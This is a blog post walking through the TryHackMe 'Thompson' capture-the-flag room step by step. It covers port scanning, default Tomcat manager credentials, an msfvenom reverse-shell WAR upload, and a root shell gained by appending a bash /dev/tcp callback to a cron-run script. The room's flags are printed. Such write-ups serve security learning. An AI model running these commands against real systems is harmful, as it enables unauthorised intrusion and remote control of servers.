CTF Walk Through - Thompson

CTF Walk Through | HackProof Academy | [email protected]


2 subscriber(s)

31/10/2024 Shad Hussain Knowledge Views 131 Comments 0 Analytics Video English DMCA Add Favorite Copy Link

CTF Walk Through - Thompson - THM


Room link : https://tryhackme.com/r/room/bsidesgtthompson


STEP1
nmap -p- -Pn -A -T4 -sSV 10.10.130.169
FINDING
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
8009/tcp open  ajp13   Apache Jserv (Protocol v1.3)
8080/tcp open  http    Apache Tomcat 8.5.5
NOTE
http is running on port 8080
---------------------------------------------------------------------------------------------------------
STEP2
dirb http://10.10.130.169:8080/

FINDING
+ http://10.10.130.169:8080/docs (CODE:302|SIZE:0)                                                                         
+ http://10.10.130.169:8080/examples (CODE:302|SIZE:0)                                                                     
+ http://10.10.130.169:8080/favicon.ico (CODE:200|SIZE:21630)                                                              
+ http://10.10.130.169:8080/host-manager (CODE:302|SIZE:0)                                                                 
+ http://10.10.130.169:8080/manager (CODE:302|SIZE:0) 
---------------------------------------------------------------------------------------------------------
STEP3
http://10.10.130.169:8080/

FINDING
+ http://10.10.130.169:8080/docs (CODE:302|SIZE:0)                                                                         
+ http://10.10.130.169:8080/examples (CODE:302|SIZE:0)                                                                     
+ http://10.10.130.169:8080/favicon.ico (CODE:200|SIZE:21630)                                                              
+ http://10.10.130.169:8080/host-manager (CODE:302|SIZE:0)                                                                 
+ http://10.10.130.169:8080/manager (CODE:302|SIZE:0) 
NOTE
click on 10.10.130.169:8080/host-manager
you will get a login popup
cancel it and you will the user id and password
ername="tomcat" password="s3cret" roles="admin-gui"/
---------------------------------------------------------------------------------------------------------
STEP4
click on 10.10.130.169:8080/host-manager
enter user id and password -- ername="tomcat" password="s3cret"
FINDING
http://10.10.130.169:8080/manager/html

NOTE
upload revershell.war in upload and deploy 
---------------------------------------------------------------------------------------------------------
STEP5
create a .wr revershell using msfvenom
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.17.65.196 LPORT=9999 -f war -o rshell.war
upload the file and see it appears in the list below
on new terminal open nc -nvlp 9999
click on the revershell which was uploaded and get e reverse shell
---------------------------------------------------------------------------------------------------------
STEP6
cd /home/jack
ls -la
cat user.txt
39400c90bc683a41a8935e4719f181bf
---------------------------------------------------------------------------------------------------------
STEP7
cat /etc/crontab
FINDING
cd /home/jack && bash id.sh
---------------------------------------------------------------------------------------------------------
STEP8
echo bash -i & /dev/tcp/10.17.65.196/8888 0&1  id.sh
open listner in new tab nc -nvlp 8888
after few mins you will get a root shell
---------------------------------------------------------------------------------------------------------
STEP9
on new root shell
ls -la
cd /root
ls -la
cat root.txt
d89d5391984c0450a95497153ae7ca3a
---------------------------------------------------------------------------------------------------------

	05.11.2024 Gauri singh Readers 95
THE BENEFITS OF LOVING SOMEONE 1. IT MAKES GOOD USE OF THE MANS ERECTION Most men wake up with an erection, i ..... Read all...

	06.11.2024 Shad Hussain Readers 171
CTF Walk Through - OverPass - THM Room Link : https://tryhackme.com/room/overpass STEP1 nmap -p- -sSV 10.10.1 ..... Read all...

	01.11.2024 Shad Hussain Readers 83
CTF Walk Through - Dav - THM Room Link : https://tryhackme.com/r/room/bsidesgtdav STEP1 nmap -p- -Pn -A ..... Read all...

	31.10.2024 Shad Hussain Readers 96
CTF Walk Through - Anonforce - THM Rom Link : https://tryhackme.com/r/room/bsidesgtanonforce STEP1 nmap -p- -P ..... Read all...

	30.10.2024 Shad Hussain Readers 244
CTF Walk Through - Ignite- THM Room Link : https://tryhackme.com/r/room/ignite STEP1 nmap -p- -Pn -A -T4 - ..... Read all...

K	28.10.2024 Kajal sah Readers 319
एक अंग सबसे महत्वपूर्ण एवं अनिवार्य कौशल संचार कौशल है। जिसके माध्यम से आप पूरी दुनिया ..... Read all...

	28.10.2024 Shad Hussain Readers 295
CTF Walk Through - Library - THM Room Link : https://tryhackme.com/r/room/bsidesgtlibrary STEP1 nmap -p- -Pn ..... Read all...

	27.10.2024 Shad Hussain Readers 232
CTF Walk Through - Bounty Hacker - THM Room Link : https://tryhackme.com/r/room/cowboyhacker STEP1 nmap http://10. ..... Read all...

	26.10.2024 Shad Hussain Readers 291
CTF Walk Through - Easy Peasy - THM Room Link : https://tryhackme.com/r/room/easypeasyctf STEP1 nmap -p- -Pn -A ..... Read all...

WhatsApp no. else use your mail id to get the otp...! Please tick to get otp in your mail id...!

CTF Walk Through | HackProof Academy | [email protected]

2 subscriber(s)

Related articles